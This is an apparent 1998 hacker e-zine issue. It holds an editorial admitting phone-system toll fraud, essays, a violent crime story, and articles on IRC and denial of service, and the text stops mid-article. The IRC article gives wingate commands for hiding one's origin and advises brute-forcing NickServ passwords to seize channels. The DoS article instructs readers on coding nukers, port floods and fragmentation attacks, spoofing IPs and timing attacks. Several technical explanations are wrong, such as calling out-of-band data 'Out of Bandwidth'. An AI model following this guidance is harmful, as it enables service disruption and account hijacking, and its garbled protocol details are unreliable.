8888888b. 888 "Y88b 888 888 # #### #### #### ##### ##### ## # # ##### 888 888 # # # # # # # # # # # # ## # # 888 888 # #### # # # # # # # # # # # # # 888 888 # # # # # ##### # # ###### # # # # 888 .d88P # # # # # # # # # # # # # # ## # 8888888P" # #### #### #### # # ##### # # # # # .d88888b. d88P" "Y88b 888 888 ##### ##### #### #### # ##### # #### # # 888 888 # # # # # # # # # # # # ## # 888 888 # # # # # # #### # # # # # # # # 888 888 ##### ##### # # # # # # # # # # # Y88b. .d88P # # # # # # # # # # # # ## "Y88888P" # # #### #### # # # #### # # ISSUE #0 888888 Nov/98 "88b Thanks to; 888 #### # # ##### # # ## # rOTTEN 888 # # # # # # ## # # # # ethercat 888 # # # # # # # # # # # # Gateways 888 # # # # ##### # # # ###### # Digital Avatar 88P # # # # # # # ## # # # Kleptic 888 #### #### # # # # # # ###### .d88P .d88P" 'The people's choice for Net Terrorism' 888P" ::::::::::: Editor-in-Chief :::: Rue-the-Day ::::::::::: ::::::::::: Chief-in-Editor :::: Cronus ::::::::::: ::::::::::: Skull Crusher :::: Ed ::::::::::: ::::::::::: Ganja Smoker :::: Niall ::::::::::: ::::::::::: Head Girly :::: Pinky ::::::::::: E-Mail discordia@Rue-the-Day.net :The Discordant Opposition Journal Issue 0, October 1998. All Rights Reserved. Nothing may be reproduced in whole or part without written permission from the editors. The DoJ is made public at irregular periods, but don't worry you won't miss us. :Contents: File 1 - Editorial : Rue-the-Day 2 - The Decay of Society : Cronus 3 - The Waiting Becomes Torture : Rue-the-Day 4 - Editor Bios' : Editors 5 - Surviving IRC : Rue-the-Day 6 - Denial of Service : Cronus 7 - Interview with Neonsurge : Cronus 8 - Mixed up Underground : Digital Avatar 9 - Virii Shit : Kleptic 10 - Conclusion : Editors :Editorial: Welcome to issue 0 of the Discordant Opposition's Journal. In this brief editorial I'll be answering important questions like 'just who are the Discordant Opposition anyway?' Naah, I won't really. What I am going to be writing about though is what this Journal is all about (and why you should write an article for it) and 'getting caught' (from personal experience). Myself and Cronus have been discussing the possibility of getting together a Zine for some time now, I always liked the idea because I love writing. So we finally did it, we affiliated it with the Discordant Opposition (don't ask) and here we are. No amazing story really. Over the next few issues we hope to bring you some interesting, thought provoking articles on various topics. that's where you the reader can help us, we can't write enough to fill the whole issues, we need reader participation. We'll only release issues when we feel that we have enough decent material to fill it so we aren't setting ourselves and schedule for releases. Anyone who knows me knows that I had a bit of trouble over the summer, I want to talk a little about that. There's a moral to the story so read on. I had been using a PBX system to make calls to friends in the US (I'm in Europe) for six months, I hadn't been caught. I got careless, a security consultant was hired and I was caught. It was all settled by paying the money back, the police were never involved, it was still all a bit bit freaky though. What I'm basically saying is common sense; just because you haven't been caught doesn't mean you won't and don't continue to do something if the risk outweighs the goal itself. I was also put in an embarrassing situation while jumping over a wall to go trashing a few weeks ago, that's a story for some other time though. Play safely kids... Rue-the-Day [root@Rue-the-Day.net] ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98 ::: The Discordant Opposition Journal ::: Issue 0 - File 2 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :The Decay of Society: Modern Society is nothing more then a sprawling cesspool of corrupt and decaying biomatter. No one has even tried to regulate society or improve upon it since well before the invention of moving electrons. The early American's were pioneers in society. Setting up a culture that was world respected for decades was no small task. But since the world wars the huge degraded continent has slowly and constantly began to fade and decline into the realms of modernly acceptable decay. As it has declined, the rest of the world has quickly followed suit. Terrorist nations grasping on this as an opportunity for more self-destructive ideas and actions. Religious cults have shot up with rapid and spontaneous regularity. Freaks and criminals have seized on the widely available source of modern communications for mass annoyance and get-rich-quick ideas. Moreover, since the US has declined in its state of national affairs, other governments have made conscious efforts to impose like-restrictions on their nations. Forced regular advertisement both on TV and in print form. Strong backing for American products over others through the notion that they are somehow more reliable even though their source of origin was clearly no where near a place of American Jurisdiction. Crimes raising with direct proportion with population increases. Mortality rates falling in small, manageable countries such as Britain or France, but raising monstrously in other poorer nations such as Sudan or Mali. The basis of human life has gradually vanished as we as a society have decided unanimously that abortion and permanent contraception is acceptable in this promiscuous world. Why should we punish for murder and still accept freely the murder on the smaller level of a foetus or an embryo? I am not commenting on abortion and the moralities behind it. I am simply trying to get the reader to think. Why do we still believe in fictional ideas of an all-seeing all-knowing father figure such as god, when the thought of leprechauns, demons and witches were demised years ago? Society still longs for some sort of protections. They still live off the idea that someone is still there watching them and looking after their best interests. God is a fictional character, and it only still exists because society can't give up their over powering father figure. People need someone to chastise them, look after them and even nurture them. By not realising that they are clinging on to an archaic image, they are living in the past without understand that the future is clearly what needs to be looked after and protected. Society has to awaken from its age-old slumber and release that it needs to look after itself and live up to expectations. Drop the phantasmal theories, re-embellish the value of human life and step in the reality that we have created around ourselves... Long live paranoia... Cronus [cronus@iol.ie] ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98 ::: The Discordant Opposition Journal ::: Issue 0 - File 3 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :The Waiting Becomes Torture: Small squares of skin were being cut from Levistus's arm with delicate precision. Lev wasn't quite sure whether this was part of the interrogation or just something to get his assigned torturess in the right frame of mind. Either way she seemed happy, she noticed his regained consciousness and a grin flashed across her face. All Lev could think of doing in response was arch an eyebrow, the heavy straps made it impossible to move anything else really. She shrugged and went back to concentrating on his arm. Pain was something he hadn't felt in quite a while. He'd had most of the pain receptors in his brain fried long ago for the sake of convenience. He'd gotten a cheap job done, his nerves too had been cauterised. It did have its drawbacks though. He'd once almost bled to death before realising that somebody had shot him in the leg. The drawbacks are probably outweighed by the ability to endure almost anything though. At least in Lev's opinion they are. He did feel a vague tingling in his arm as the scalpel danced over his exposed skin. He almost found himself savouring the meagre sensation. He quessed that this would leave his arm looking like a miniature chessboard or something. What the fuck, another conversation piece. Torture was becoming a ridiculous business he reflected. What could you do to people who could barely feel? Mind altering drugs were out too, those receptors removed long ago. Only the most potent hallucinogens had any effect on him, LSD gave him a mild headache. He could feel the cold table under his naked body and the arm puddle of blood forming around his left arm. He ignored he discom- fort he was feeling and thought back to the Norland Allied Bank job. Where things had started... *** Levistus' contemporaries lacked initiative when it came to technology. A few pretty basic precautions can do wonders for the operational integrity of a bank robbery. Anything above and beyond the basic and success is almost guaranteed. Levistus handled the tech aspect, the two other members of his crew were Whitie and Mesh. Whitie was a weapon nut, a kind of 21st century samurai. His nickname came from his peroxide white hair and pale complection. Mech drove the gateway cars, she was a speed freak in every sense of the two words. The bank had only had two security gaurds. Arrogant bastards, they obviously weren't expecting to get hit, their mistake. Levistus and and White had walked into the back exuding confidence. The interior was a stark nightmare of chrome and pale marble all lit by harsh florescent lighting. Apparently this was stylish. It wasn't a busy time for the bank, there were only a few individuals queuing and milling around. Two visible security guards. Well before entering the bank Levistus had taken the precaution of knocking out the phone lines in the bank's immediate vicinity. Lev and Whitie sat down on a leather couch supplied for weary bank patrons. Lev got out his scanned and his earphones and began to listen. It seemed that there was very little police activity in the area. The hissing silence was only occasionally broken by murmured resports of traffic violations and the saga of a messy case of domestic violence. Typical shit really. Dull and mundane. The second instalment of this story will be in the next issue... Rue-the-Day [root@Rue-the-Day.net] ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98 ::: The Discordant Opposition Journal ::: Issue 0 - File 4 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Bios': Nick: Rue-the-Day E-mail: root@Rue-the-Day.net Reason behind nick: Most people who know me would probably agree that an old, archaic English phrase that's fallen into disuse is suitable for me. Actually I do see 'rue' used a fair amount, always brings a smile to my face. Usually in fantasy or sci-fi books, but that's okay. Incidentally 'rue the day' means to regret a past misdeed or action, glad we've got the cleared up. I guess that I have to ask myself two questions; 'What do I want to tell people about me?' and 'What do people want me tell about myself?'. I think the answer to both is 'as little as possible'. Brief physical description (for those that care). I'm tall (6'3"), thin and pale. I wear a lot of black, I'm generally the kind of guy that people refuse to sit next to on public transport. It has something to do with my self-perfected aura of menace, I think... I'm involved in the Kevin Mitnick campaign, I'll be talking more about that in future issues, I feel that is very impor- tant. At this point I'm primarily interested in hacking although I do still phreak (when I need to). I'm quite fond of Unix, definitely as an alternative to Windows. Nick: Cronus Reason for nick: Cronus was a Greek mythological God. He was God of the skies and also ruler of the Titans. The nick is my celestial ego trip... Background: I got involved with computers at an extremely young age and taught myself to program. This progressed to going on-line for the first time as a teenager. I have been learning and understanding ever since I first sat in front of a computer and the net was simply on outlet for that. I quickly got interested in hacking and my knowledge grew and still is growing. Ethos: I live by firm ethics of never damaging and never taking money. Victims are not just there, they are man-made. Areas of interest: Computer security, both Unix and NT. Also programming and freelance web design (something has to pay the bills). Description: Hmm... tall, big and scary or so I'm told. My eccentric personality is to my credit and my heavy sense of morals to my advantage. Current projects: This Zine namely, but also my site is getting a major over-haul; http://homepages.iol.ie/~cronus and I am actively securing a few servers (from the outside). ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98 ::: The Discordant Opposition Journal ::: Issue 0 - File 5 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Surviving IRC: By Rue-the-Day http://www.Rue-the-Day.net/ This focus of this article isn't really about 'hacking' IRC in the sense of the word that most people use, it can be used to give people ideas on ways to exploit flaws on IRC though. When I think about hacking I don't just think about things I can use, I also like to try to think about what others may use against me. I spent a fair amount of time on IRC and became familiar with a lot of the pitfalls that people find themselves in, I decided to write this article to make people aware of them. I'll cover various ways in which you can help to decrease the chances of anything too damaging happening to your system while on IRC. All of this is taken from my own experience [not usually as a victim though], I hope it helps a few people out. Your choice of Client. To connect to irc you need an irc 'client'. What the client does is provide an interface between you and the IRC server. There are many clients out there but a few are used more than others. My personal choice is 'XiRCON', which I would recommend you check out. Its homepage is http://www.xircon.com and you can also get other stuff to do with it like scripts from there. The most popular IRC client is mIRC but as a consequence there are a lot of well documented security flaws in it, I would not consider it anywhere near as good as XiRCON. Even the latest versions of mIRC can be frozen by 'Hanson' programs and all of the earlier versions are vulnerable to other attacks as well. XiRCON has a lot of nice features, it allows multiple server connections easily and uses tcl for it's scripting language which is also used in X-Windows. Give it a look and see what you think. Your choice of IRC Scripts. When you're looking at what you want from an irc script there are some basics that you definitely need such as a link looker to detect netsplits and rejoins and mass modes for kicking and banning, other options are also good. Most scripts have a lot of features that you would probably never need and if you want one that does something specific the chances are that it already exists, if you can't find it then write it yourself! Another important feature is a nice and easy wingate connector but more on that later. A very cool friend of mine once said 'The best script you can have is the one you coded yourself.' and he was right. The script that I use, penance, is one that I've coded some of myself and kludged together from various other scripts that I liked. It has a ctcp cloak, a fake version and general ctcp reply sender, link looker and nethack detector as well as some other stuff, the point is that even though the features it has aren't incredible by any means I get by with it well. You don't need everything with bells on because chances are you won't get a chance to use half of it, when it comes down to it go for practicality over all else. There are loads of script archives available on the web although a lot of them have very questionable quality stuf to offer. It is also worth noting that popular war scripts like 7th Sphere are now k-lined from most of the big servers. I have also heard that 7th Sphere has a trojan feature which allowed it's creators to eavesdrop on people using the script. This is important to consider, many scripts have inbuilt features that you may not be aware of, some will change your username without you being aware of it ['oh, I was wondering why none of my aops were functioning...'] and some allow others to see who else is using the same script on that particular server. Some scripts have sections in them commented out and others ahve features that will only be obvious from taking the time to glance over the code, take the time to do that - get to know the scripts you use. Some scripts will claim various things like deop protection or ban protection but aren't coded properly and therefore can't do what they claim to, others are full of bugs and shouldn't even be released as beta tests - don't place trust in scripts like this. Choose scripts that work and make sure that the features you'll want to use function as they should. Wingating. Anonymity can be hard to achieve on irc, if people know you're ident then pretending to be someone else isn't easy. For instance when I'm on irc my ident will be something along the lines of 'Rue-the-Day Rue-the-Da@p155.portlaoise1.tinet.ie'. With just that information you can narrow down my location to Ireland and even within that to an area around the Portlaoise node for tinet. So how would I conceal my location? Wingating. Wingating allows two computers to share a connection, when it is first installed it has certain defaults running. Like all defaults they aren't necessarily ones that you'd want to leave active, careless admins leave them running though. You can use a wingate to bounce your connection to irc through and therefore appear to be coming from wherever the wingate is set up, for instance I could be 'Rue-the-Day Rue-the-Da@prairienet.nz' or wherever I could find a wingatable connection. You can search for wingates by putting an ip string into a domain or port scanner and scanning for port 23. Domain scanners can be found by searching the web. Once you've found wingatable servers you can then connect to them, this can be done manually or through a script. To connect in mIRC type '/server wingate.ip' and then '/quote irc.chat.net 6667' next type '/quote user blah blah blah@server.net blah' and finally '/quote nick yournick'. The method of connection is similar in XiRCON and there's a script to do it at my site [http://www.Rue-the-Day.net/] that does it as well, written by a friend who wishes to remain anonymous. Netsplits, Link Looker and Nethack protection. What is a netsplit? A netsplit is when a specific server [or servers] splits away from the main server. When this happens [and if you have a script with Link Looker built in] you will be notified, some versions also tell you who split off with the server as well. If a person connects to a server that has split and join a channel that she wishes to hack and nobody else is there then she will be opd. When the server reconnects then she will be opd in the channel and will then have to try to get rid of the other ops. I spent most of my time on DALnet so I'm not sure waht it's like on some of the other servers but when I was there netspklits were very common, we had thirty five at one time once - it was almost every server. A lot of the XiRCON scripts I've seen [including my own, 'penance'] have 'Nethack protection' which basically monitors for anyone riding in on a split server and deops them or devoices them, it will also warn you if the person joins from a split even if they didn't get oped or whatever. This combined with Link Looker means that you are constantly aware of anything going on to do with netsplits. Bots can also be set up to detect attempted take overs and defend the channel be deopping the person riding in on the split. With XiRCON you can connect to another server in a different window and so be on both sides of the split at the same time, this is also very handy. It means that you can see what's going on in the channel that you want to take and also who you'll need to deal with to gain control of the channel. Denial of Service attacks [DoS]. Denial of Service in one of it's most basic forms is the 'nuke' or 'icmp bomb'. Although a lot of people out there are patched it's a continual source of amazement to me the large numbers who aren't. Denial of Service attacks mostly work by sending signals to your computer, an example being OOB [out of band data] which will cause net disnconnection, a system error or the closing of certain connections. Ping floods are another common attack used to slow or cut off people's access. When supplied with a target ip a ping flood program will send successive ping requests consuming a huge amount of bandwith and will either result in lag for the victim or a ping timeout. Patches are available to block the flaws that some of the various DoS attacks use, programs such as 'nukenabber' are also on the web and offer further protection. Port watchers will monitor for attempted DoS attacks and warn you of the attempts, some also log the details of the attack for furure referance. Using unux to go on IRC makes you invulnerable to a lot of the more common methods of attack out there and gives you access to DoS attacks like LaTierra and commands like ping -f, XiRCON is available for Linux under the name 'ZiRCON' and while I haven't tried it out I've been told that it's pretty cool. While I could go really in depth into the mechanics of how and why DoS attacks work it would really require a full article to do so. [Psst, check the Zine...] Precautions you can take. This is just a bunch of stuff that I've found useful during my time on irc. If somebody asks you for an address that they can email you at and you aren't sure that you trust them not to turn on you and email bomb you on some later date what do you do? You don't want them to have your actual email address - set up a freemail account and give that address out to people, a usa.net account, like rue-the-day@usa.net, can be gotten at http://netaddress.com/ or a hotmail account can be gotten at http://www.hotmail.com. Accepting files from people you don't know very well can be dangerous as well, if somebody offers 'nuke protection' or some cool sounding program be very dubious as to it's true function. One of the programs that it could in fact be is 'Evilftp' which allows somebody to ftp to your computer through a password protected port and do basically whatever they want to your box, be wary. Back Orifice is another and it is simply a good idea not to accept any files from people you don't know. Some channels have bots or scripts that will send private messages to anyone entering the channel set up to say things like 'for a list of the files available from the #whatever fileserver type '/who *'. This is a particularly easy 'attack' because it's one you do to yourself. Typing '/who *' gives you a listing of all the people on whatever server you're on, like the whole of DALnet or EFnet or whatever. This completely floods you and results in a dead socket and your disconnection from irc. A healthy degree of suspicion can be a good thing on irc. I have seen attempted takeovers of channels in which I'm opd by very convincing IRChackers posing as friends. People on DALnet especially are guilty of having far too much faith in the services that the server provides, nickserv and chanserv. For instance if an enemy of mine decided to use my identity on irc to take over a channel in which I'm a trusted regular he could use a wingate to approximate my ident, let's say he managed 'Rue-the-Day Rue-the-Da@dubexs.iol.ie' now people would see the '.ie' and assume it's me, anyone from Ireland or who pays attention to such things would know that my isp was 'tinet' not 'iol' and that I wasn't in Dublin but all it would take is one person to believe it long enough to op the fake 'me' and the channel would be taken. One way to get around this is to do your best to remember people's idents but then a lot of people spoof and mess around with wingating and vhosting anyway so that isn't too easy to do, some people maintain databases of their friends idents and can access them easily through irc scripts. That's even easier on servers like Undernet or EFnet where anyone can nuke somebody offline and take over their nick. Let's say that the channel that the person posing as me wanted to take over was on DALnet and my nick was registered, surely they wouldn't be able to do it right? Wrong. I have heard of a few ways to hack nickserv and chanserv, some are fact and some are rumour. The easiest way to hack nickserv passwords is to run a bot and bruteforce the person's passsword with a dictionary based attack. If the person doesn't have nickserv enforcement active then there is nothing to stop you posing as the person, chanserv won't op you until you enter the person's password but it should be easy enough to convince people that chanserv is just lagged or fucked up [all too easy to believe -sigh-] and get them to op you. Other methods include using database synchs to re-register existing channels, unsubstantiated but would be easy enough to prove or disprove with a bot or script. Another method currently being investigated by a friend of mine, Cronus [http://homepages.iol.ie/~cronus], is an attack to flood nickserv and cause it to crash making it easier to take over channels. If you know of any other ways in which to exploit DALnet services or irc in general I'd be interested in hearing them, please email me any information you have [root@Rue-the-Day.net]! The Conclusion So what am I saying - trust no one? No, I'm just saying that a healthy amount of skepticism doesn't go astray, if you hear from people that somebody is going around posing as channel regulars then be suspicious of people who don't seem right, usually their behaviour gives them away - somebody who's always polite and cool saying 'op me or dieeeeeee!' suddenly is a bit of a dead give away. If you take nothing else from this article at least realise that there are dangers on irc, try to be aware of them. I hope this helped people to think about it a little more. Speaking of helping people out, I'd really appreciate if anyone out there who knows of flaws or exploits in the various Java chat applets or CGI scripts which allow web based chat to email me [root@Rue-the-Day.net] with them for an article I'm writing. Thanks. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98 ::: The Discordant Opposition Journal ::: Issue 0 - File 6 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Denial of Service: by Cronus *Introduction Denial of Service attacks are extremely useful and somewhat down grading attacks run over the net. In this article I will explain the different types of DoS attacks, their effectiveness and the sub culture that is associated with them. This file aims to teach you about the different types of attack, how to code them and how to bar against them. *Explanation Denial of Service attacks are specific attacks that can be run over the Internet or over a phone line. They attempt to shut down or seriously slow down a service provided by a computer system. By setting up fake connections, exploiting a flaw or flooding a computer with data packets the attack attempts to close the computer down and shut off its services. *Ping of Denial The primary and oldest denial of service attack. It is the most original attack and still the most widely used. Essentially the notorious Ping of Death is an attack that slows down the reaction time of the server that is being attacked. Ping is a technical term used on the net. When you ping a server you send a ping signal to it. The server receives the ping command and responds with a pong signal. Your computer keeps record of the time taken from the ping being sent and the pong being received. The time that is taken for the reply is considered the ping time and that is considered the lag of the server. The Ping of Death attack simply floods the server under attack with ping requests and lags the server so badly that all its services are seriously slowed down or at worst totally cancelled out. An effective ping attack can actually shut down the server for as long as the attack is maintained. Protection for the mighty Ping of Death isn't all that simple. All net computers at the moment need to have ping capabilities. On IRC for instance, no ping reply to the IRC server will cause you to be disconnected. Some more modern OS releases come with larger ping buffers in order to catch attempted attacks. They buffer the attacks before replying, this gives them enough time to either send a reply or realise that its an attack and close the port. But again, making the computer think that you are attacking can be good enough to knock a server offline. *Out of Bandwidth This attack is sometimes refereed to as a Win Nuker. Windows uses specific Internet software to operate its network connections. This is called Netbios. Rhino9 have done an excellent file on Netbios and its flaws. It is particularly venerably on ports 137, 138 and 139. Connection to them can cause serious errors in Windows. NT has been known to crash with these flaws and 95 has been reported to freeze or loose the net connection. Out of Bandwidth is a standard error message that is used by Netbios. It essentially tells the computer that there is no more space for the computer's net connection. The computer thinks that the signal was received from the Internet provider and so drops the line. If you send random data to any of these ports, it is very likely that the computer will freeze or crash. Coding a Nuker such as this is extremely simple. Simply write a program that connects to a target IP on either port 137 or 139. Then it should send random data to the open port, followed by the OOB message. There are patches for this old Windows flaw available from the Microsoft Site. Windows is the only OS that is vulnerable. By updating your version of Winsock you will patch that hole and protect your computer. Because Windows is the only OS that is susceptible to this attack and the fact that a patch is available, it makes it a somewhat obsolete attack. Never-the-less many Windows computers are still unpatched and for that reason it can still be used against certain systems. *ICMP ICMP is a protocol that doesn't require a connect such as TCP. You don't actually have to be connected to a computer in order to send it ICMP packets. This protocol is mainly used to set up connections, send error messages and monitor Internet connections. It is possible to set up an attack using only ICMP error messages. There are several ICMP messages that can be used to close an Internet connection such as; · DESTINATION UNREACHABLE · TIME TO LIVE EXCEEDED · PARAMETER PROBLEM · PACKET TOO BIG · SOURCE QUENCH It you were to send one of these messages to an open ICMP port, it would have the effect of closing the connect and disconnecting the computer from the Internet. Of course you would have to spoof the source address in order for the server to think the message came from the ISP. Certain systems are more vulnerable then others. Windows by default have ICMP redirect turned off. This makes it perfectly protected from this type of attack. However, most systems, including UNIX, have redirect turned on. This is because it can be very useful and necessary for a fast net connection. But if you feel at risk it might be necessary to close the ports that are effected. Some research on the topic will get you more information on what you can do to secure your specific machine. *Fragmentation The most modern type of net attack is fragmentation. This can be used on most systems quite easily. It is new attack and is still not used that widely. Essentially this attacks revolves around IP data packets. Whenever a computer sets up a net connection. It uses data packets to communicate with other computers on the net. This attack sends data packets to a computer that are deliberately fragmented. The packets are incomplete in their content. The computer that receives the fragmented packets sets up a routine to listen for the rest of the packets. While your attack stops sending those packets and starts to send another thread of fragmented packets. As the amount of threads build, the computer under attack slows down and will eventually crash or drop the net connection. Code a program to do this would require a high degree of programming knowledge. On a UNIX machine, you will need to have root access to run an attack like this because you will need to have raw access to the ports. You will need to code in a low level language for a Windows machine. You will also need to develop some means of optimisation that allows you to set-up multiple threads to speed up the attack. This attack should be effective on most operating systems. Although some protection have been set-up on some systems, most of them are still susceptible. Even ones that have protection should be vulnerable. While some systems will buckle faster then others, they will all buckle soon enough as long as you maintain the attack for long enough and your connection is fast enough. *E-Mail Bombing While this isn't always considered a denial of service attack. I decided to include it in this file as it can be used as a very effective DoS attack. While mail bombing is only usually used as a form of revenge or retribution, it can be used to crash a server in order to run a successful denial attack. If you wanted to crash a server, you might find in your research that it handles the SMTP protocol. This would open up the possibilities of mail bombing the server. If you were to bomb the target computer with a huge amount of mail messages, you might be able to flood the computer and choke up its hard drive space. The more space you take up, the more lagged the server will become and if you keep up your attack you will eventually cause the computer to crash due to lack of HD space. There isn't really any way of protecting against a mail bomb attack. If your computer needs to have mail capabilities, you can't close the mail ports. It is possible to set up a mail buffer to try and catch the attack. All operating systems are vulnerable to an attack of this sort. But more modern systems are set up in more advanced ways in order to catch possible attacks, but no way is perfectly secure. *Specific Flaws All operating systems have been found to contain security holes. Some of this holes can cause simply annoyances, others are serious flaws in the system that can cause it to crash or freeze. If you are aware of the system that you are attacking, then you will be able to find a hole in that system to exploit. Windows NT is one of the most modern server software packages that has been released. It can turn a normal computer into an Internet Server. This drastic upgrade means that it has become very popular among small companies that need to run a low cost server on the net. It has several very well documented holes that can be used against it. Certain UNIX routines are known to contain flaws that can exploited without actually have access to the server. They can be accessed over the Internet making an attack very easy. Certain deamons such as sendmail are widely known to contain flaws in its programming. Searching for these exploits would give you the direct capabilities to attack the server. Research over the net would be the best way to find exploits for specific systems. While most DoS attacks are general attacks, that need to be directed at a certain OS, some are unique and these need to be researched. *Port Flooding Port flooding is when your attack centres around flooding a certain port with multiple connections. This attack specifically floods a port with so many connections that the target computer is severely lagged that it starts to drop its other connections. UNIX machines have a process table that contains a list of all the programs that are currently running on the machine. If you were to flood the process table with dozens of invocations of a specific program, you will start to slow the sever response time down. For instance, if your attack were to make multiple connections to port 25 on a UNIX machine. You would flood the process table with lots of invocations of the sendmail program. This will soon start to disconnect other connections. And as the other programs die off, the attack would flood the free space, this would mean that the computer wouldn't be able to host any more connections or internal programs. A port flooding program can very easily be written. It would connect to the target computer with as many possible connections as your computer can handle. You would need to maintain the flooding for as long as the attack was necessary. If the program was starting sendmail routines, it would simply connect to the target computer on port 25 and then would hold the connection without sending an data. The attack would hold the connection till the target computer cut you off. *SYN Flooding The SYN - ACK protocol is a 3-way handshake for setting up Internet connections. A computer sends a SYN packet to the server. The server receives the SYN and responses with an ACK packet. The connection is now set up and running. The SYN flooding attack is based on an incomplete handshake. The attacker sends a SYN packet from his computer to the server under attack. The server responds with an ACK packet to acknowledge the connection. Then the attack would simply send another SYN packet and wait for the server to respond. By flooding the server with connections that don't actually send any information, you will start to lag it and perhaps even crash it. The Internet stack will wait a certain amount of time before dropping the connection, a SYN flooding attack will therefore keep setting up connections faster then the computer under attack can drop them. And by doing so can crash the server quite easily. There is no real way of securing a server from this type of attack. The problem lies in the fact that the SYN - ACK connection is a necessary protocol for a net server. Without it, it would be severely restricted in its on-line transactions. But by restricting the number of possible connections at any one time, you drastically reduce the chance of there being a problem. *Unique Attacks There are certain services that are available only on specific servers that you may need to attack. If the service is unique enough you may have some difficulty actually attacking it. One example is the services.dal.net server. It runs the services that are provided for the DalNet IRC network. ChanServ, MemoServ and NickServ are very unique services that are run from this server. These services can be accessed from anywhere on the DalNet IRC network. Hundreds of connections are consistently connected to DalNet and all these people are using the DalNet services repeatedly. To take over an IRC channel on DalNet you might want to shut down ChanServ. To do that you would need to research the service and find a hole in it that you can exploit. You may be able to research a little to find software similar to it that has some exploits already documented. *IP Spoofing Most DoS attacks are run from your own computer. Unless you want a pesky system administrator ringing you the next day, you will need to find some way to hide your location from the target computer that you are attacking. IP spoofing is the hardest thing that can be done these days in the world of hacking. There are several ways to hide your location from the log files on a target computer. Some are more appropriate then others because of the advantages and disadvantages. Wingating is the most widely used bounce technique. It involves connected to a computer that is running the Wingate program, so can then bounce off that computer and route your connection to another computer. This isn't really a choice for DoS attacks, because these attacks usually reply on speed for the attack. Wingate systems are slow and lagged on their own, your added connection won't help. IP packet spoofing is the next possibility. It involves creating an attack that actually sends packets of data that spoof the original IP address. This can't be achieved in a Windows environment, because Windows controls too much of the net interface. It is much easy to accomplish in on an UNIX machine as when you are programming you can have access to the raw sockets. As you can specify exactly what you want to send to the network output you can exactly choose the information to send out. You can even send a specific IP address that you wish the packets to seem to come from. *Making Your Attack All you need to make a successful attack is a little information on the server. You should probably try to log onto the server as a Guest account and try to gain as much information as you can. You will need to have the operating system information and a list of the software running internally or on the ports of the server. Search for techniques to exploit the server and its software. Once you have the necessary information or utilities you can attack the server. You will probably want to choose a time for the attack that would be could for your net connection. A time that your ISP won't be too bogged down with connections. Also a time that the net won't be flooded with users. The more relaxed the Internet is, the faster your connection will be and the faster your attack will go. You need to select a time that will allow you to have enough time on-line to complete the attack and go ahead with whatever you intend to do after the server drops. *Research There are lots of websites that discuss server exploits and software holes. You can search for information on the software and you should be able to find the necessary techniques and information for attacking the server. Here are a few; · http://www.rootshell.com · http://www.cdc.com · http://www.warforge.com Also check out my site http://homepages.iol.ie/~cronus for updates. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98 ::: The Discordant Opposition Journal ::: Issue 0 - File 7 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Interview with Neonsurge: What are your main underground interests ? NeonSurge : WindowsNT Security (anything affecting Microsoft Products really). New Crypto mechanisms are always of interest. And corporate espionage and sabotage is neat. How long have you been involved in that activity ? NeonSurge : Since 1984 How did you get involved in the net underground ? NeonSurge : That's a really long story. It started locally for me in my hometown along time ago. At the time, the net wasn't really much... Everything was text based and not as pretty (that's a joke). At the time private BBS and VMB's were the big thing. You would get updates as to the new shit to try via listening to other peoples VMB's. At that time my stomping ground was SprintNet (x.25). From there it was a natural progression to what I do today I suppose. How did you learn ? NeonSurge : Reading. Playing. Reading. Reading. Reading. Playing. What advice would you have for a beginner in the underground ? NeonSurge : See Above. Do you feel that the underground community has evolved in a good or bad way ? NeonSurge : For the most part I think it has evolved in a bad way. No one really shares information anymore, which is a sad thing. The only good way in which the scene has evolved is the availability of the information that is shared. Do you wish to publicly admit any criminal activities relating to the net ? NeonSurge : No. Not at this time, thanks... Is there any thing you would like to pass on the net community ? NeonSurge : Don't be stupid. Don't be afraid to learn new technologies, Unix and Linux are not everything. Do you have anything you would like to add ? A quote perhaps ? NeonSurge : Don't eat the big white mints. Contact Information ? neonsurge@hotmail.com http://rhino9.ml.org ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98 ::: The Discordant Opposition Journal ::: Issue 0 - File 8 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :The Mixed Up Underground: Hacking as we know it is very mixed up. There are so many people trying to be hackers [I'm going to refrain from the word wannabe] that only some make it to that goal. The rest get lost somewhere in the void between. The best way to stop hacking is never to start. Hacking isn't a bad thing. But its a commitment. Like having a family or something. My best advice to newbies is not try to learn how to "hack". I suggest learning about computers. Have fun with them. Set up a network. Use Windows for all I care. For all anyone cares. Those who say the first step to becoming a hacker is setting up Linux are stupid. They should be thrown out to the dogs. Most newbies don't even know what UNIX is and trying to explain that Linux is a version of UNIX written by Linus Torvalds originally from a modified from of Minix and that it runs on Intel based home computers with a partition which allows multiple operating systems is pushing it. Woah. If a newbie understands that then they should go work for NASA and help return our glorious urge for space exploration back to what it used to be. In my opinion, if a person feels the need to become a hacker or push their computer to the extreme then they should do just that. Push their COMPUTER to the extreme. Not rack their brains for hours on end and eventually wind up in that void I talked about earlier. Hacking is about getting into computers...hmm..so if you know about your own computer allot then maybe...just maybe it makes it possible for you to get into another computer. There's a thought. Then you don't have to read all those hyped technical manuals that you get bored reading. Instead you can have fun and do things. Sounds better to me. This is not a guide "how to hack" if you don't already know. I plan to write a page about how the hacking society has turned into something like the US Government which hackers supposedly dislike. Why? Because its corrupt and power-hungry. In the end all things made by humans or used by humans or organised by human's turns into something like that. So forget listening to others. Do things your way. If you don't want to read this text or that or set up Linux, then don't. There are no requirements for being a hacker. If there were then I'm sure that the hacker society would go form a new country and label it "copy of the US Gov." But no. It hasn't got that bad yet. So learn while you can. Maybe it will help you out in life. Or maybe you will end up in the cage with murderers and rapists. I dunno. Would that be fun? Thats what happens if you try to hard to learn too fast. So back to the original idea of just losing the generally thought idea of how to hack and just learning computers. If you really want some quick tips on becoming a hacker in non-conventional ways then here they are. Get like 2 or 3 computers. 